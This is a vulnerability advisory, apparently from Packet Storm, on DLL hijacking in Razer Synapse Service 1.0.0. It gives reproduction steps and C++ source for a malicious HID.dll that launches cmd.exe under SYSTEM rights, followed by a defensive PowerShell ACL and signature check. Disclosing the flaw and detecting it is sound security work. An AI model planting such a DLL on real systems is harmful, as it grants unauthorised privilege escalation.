Razer Synapse Service 1.0.0 DLL Injection

18 Mar 2020 | Reported by Juan Sacco | Type: packetstorm | Source: packetstormsecurity.com

Razer Synapse Service v1.0.0 DLL Injection, privilege escalation

Code
`Discovered by: Juan Sacco <[email protected]>  
Razer Synapse Service v1.0.0 is prone to a DLL Injection because it  
fails to properly filter user supplied input and loads a .DLL from  
%ProgramData% from userland with SYSTEM rights, allowing escalation of  
privileges from a regular user to SYSTEM rights.  
  
Program: Razer Synapse Service  
Version: 1.0.0  
Vendor: https://www.razer.com/  
Download link: https://www.razer.com/downloads  
  
Steps To Reproduce:  
Move your .DLL to C:\ProgramData\Razer\Synapse3\Service\Bin\HID.dll  
Restart the PC or restart the service. The service runs with SYSTEM rights.  
Enjoy your privilege escalation!  
  
Supporting Material/References:  
ProgramData specifies the path to the program-data folder (normally  
C:\ProgramData). Unlike the Program Files folder, this folder can be  
used by applications to store data for standard users, because it does  
not require elevated permissions. Reference:  
https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-8.1-and-8/ff716245(v=win.10)?redirectedfrom=MSDN#feedback  
  
Razer Synapse Service.exe loads a DLL (HID.dll) that provides the  
function "HidD_GetHidGuid()" from the  
ProgramData\Razer\Synapse3\Service\ folder. Using the following code we  
can compile a DLL that exports this function so that it is called during attach.  
  
// dllmain.cpp : Defines the entry point for the DLL application.  
#include "pch.h"  
#include "windows.h"  
BOOL APIENTRY DllMain( HMODULE hModule,  
                       DWORD ul_reason_for_call,  
                       LPVOID lpReserved  
                     )  
{  
    char cmd[] = "cmd.exe /c";  
    // Every loader notification runs the command and then ends the host process.  
    switch (ul_reason_for_call)  
    {  
    case DLL_PROCESS_ATTACH:  
        WinExec(cmd, SW_SHOWNORMAL);  
        ExitProcess(0);  
    case DLL_THREAD_ATTACH:  
        WinExec(cmd, SW_SHOWNORMAL);  
        ExitProcess(0);  
    case DLL_THREAD_DETACH:  
        WinExec(cmd, SW_SHOWNORMAL);  
        ExitProcess(0);  
    case DLL_PROCESS_DETACH:  
        WinExec(cmd, SW_SHOWNORMAL);  
        ExitProcess(0);  
        break;  
    }  
    return TRUE;  
}  
  
// Export with the name the service resolves from HID.dll.  
extern "C" __declspec(dllexport) void HidD_GetHidGuid()  
{  
    char cmd[] = "cmd.exe /c";  
    WinExec(cmd, SW_SHOWNORMAL);  
}  
  
Impact  
A regular user could abuse this vulnerability to gain full SYSTEM rights.  
`
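
A defender's check for the condition the advisory describes, as an added example that is not part of the original advisory: it reads the ACL of the directory from the reproduction steps and reports Allow ACEs that let standard-user groups add files there, plus the signature status of any HID.dll found in it. The parameter names, the SID list and the rights mask are assumptions of this example; save it as a .ps1 script to run it.

```powershell
param(
    [string]$Dir     = 'C:\ProgramData\Razer\Synapse3\Service\Bin',  # directory from the advisory
    [string]$DllName = 'HID.dll'                                      # DLL named in the advisory
)

# Well-known SIDs that cover standard users (SIDs avoid localized group names).
$lowPriv = @{
    'S-1-1-0'      = 'Everyone'
    'S-1-5-4'      = 'INTERACTIVE'
    'S-1-5-11'     = 'Authenticated Users'
    'S-1-5-32-545' = 'BUILTIN\Users'
}

$fsr = [System.Security.AccessControl.FileSystemRights]
# Rights on a directory that allow adding or replacing a file in it.
$writeMask = [int]($fsr::CreateFiles -bor $fsr::DeleteSubdirectoriesAndFiles -bor
                   $fsr::ChangePermissions -bor $fsr::TakeOwnership)
# GENERIC_WRITE and GENERIC_ALL, which can appear unmapped in an ACE.
$genericMask = 0x40000000 -bor 0x10000000

if (-not (Test-Path -LiteralPath $Dir -PathType Container)) {
    Write-Output "Directory not present: $Dir"
    return
}

# Ask for SIDs instead of account names; include explicit and inherited ACEs.
$rules = (Get-Acl -LiteralPath $Dir).GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])
$findings = foreach ($rule in $rules) {
    $sid = $rule.IdentityReference.Value
    # Simplification: only Allow ACEs are evaluated; Deny ACEs are not modelled.
    if ($rule.AccessControlType -ne 'Allow' -or -not $lowPriv.ContainsKey($sid)) { continue }
    # Inherit-only ACEs apply to child objects, not to the directory itself.
    if ($rule.PropagationFlags -band [System.Security.AccessControl.PropagationFlags]::InheritOnly) { continue }
    $bits = [int]$rule.FileSystemRights
    if (($bits -band $writeMask) -or ($bits -band $genericMask)) {
        [pscustomobject]@{ Principal = $lowPriv[$sid]; Rights = $rule.FileSystemRights; Inherited = $rule.IsInherited }
    }
}

# Report a copy of the DLL in that directory together with its Authenticode status.
$dll = Join-Path $Dir $DllName
if (Test-Path -LiteralPath $dll -PathType Leaf) {
    $sig = Get-AuthenticodeSignature -FilePath $dll
    Write-Output "$dll present, signature status: $($sig.Status)"
}
if ($findings) {
    Write-Output "Standard users can add files to ${Dir}:"
    $findings | Format-Table -AutoSize
} else { Write-Output "No write ACE for standard users on $Dir" }
```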
